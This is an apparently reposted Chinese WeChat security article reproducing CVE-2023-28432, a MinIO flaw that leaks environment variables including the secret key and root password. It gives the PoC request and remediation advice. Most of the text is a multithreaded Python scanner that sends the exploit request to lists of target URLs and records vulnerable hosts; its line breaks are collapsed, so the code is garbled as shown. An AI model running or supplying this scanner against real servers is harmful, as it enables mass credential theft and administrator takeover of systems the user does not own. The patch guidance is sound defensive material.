MinIO存在信息泄露漏洞,未经身份认证的远程攻击者通过发送特殊HTTP请求即可获取所有环境变量,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录MinIO。
影响版本:MinIO RELEASE.2019-12-17T23-16-33Z
app="minio"
POC:POST /minio/bootstrap/v1/verify
1、升级到安全版本RELEASE.2023-03-20T20-16-18Z,下载链接:https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z。
2、临时修复方案,在waf上配置策略,拒绝所有post到/minio/bootstrap/v1/verify的请求。
import requestsimport sysimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport randomurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)filename = sys.argv[1]url_list=[]def get_ua():first_num = random.randint(55, 62)third_num = random.randint(0, 3200)fourth_num = random.randint(0, 140)os_type = ['(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)','(Macintosh; Intel Mac OS X 10_12_6)']chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36','(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])return uaproxies={'http': 'http://127.0.0.1:8080','https': 'https://127.0.0.1:8080'}def wirte_targets(vurl, filename):with open(filename, "a+") as f:f.write(vurl + "n")#pocdef check_url(url):url=parse.urlparse(url)hostname = url.hostnameurl=url.scheme + '://' + url.netlocvulnurl=url + "/minio/bootstrap/v1/verify"headers = {'User-Agent': get_ua(),"host":hostname,"Content-Type": "application/x-www-form-urlencoded"}data=""try:res = requests.post(vulnurl, verify=False, allow_redirects=False, headers=headers,data=data ,timeout=5)if res.status_code == 200 and "MinioEn" in res.text:# print(res.text)print("�33[32m[+]{} is vulnerable�33[0m".format(url))wirte_targets(vulnurl,"vuln.txt")else:print("�33[34m[-]{} not vulnerable.�33[0m".format(url))except Exception as e:print("�33[34m[!]{} request false.�33[0m".format(url))pass#多线程def multithreading(url_list, pools=5):works = []for i in url_list:# works.append((func_params, None))works.append(i)# print(works)pool = threadpool.ThreadPool(pools)reqs = threadpool.makeRequests(check_url, works)[pool.putRequest(req) for req in reqs]pool.wait()if __name__ == '__main__':arg=ArgumentParser(description='check_url By m2')arg.add_argument("-u","--url",help="Target URL; Example:http://ip:port")arg.add_argument("-f","--file",help="Target URL; Example:url.txt")args=arg.parse_args()url=args.urlfilename=args.fileprint("[+]任务开始.....")start=time()if url != None and filename == None:check_url(url)elif url == None and filename != None:for i in open(filename):i=i.replace('n','')url_list.append(i)multithreading(url_list,10)end=time()print('任务完成,用时%ds.' %(end-start))
参考链接
https://github.com/Mr-xn/CVE-2023-28432https://nvd.nist.gov/vuln/detail/CVE-2023-28432
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。文库内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(无问之路):CVE-2023-28432漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论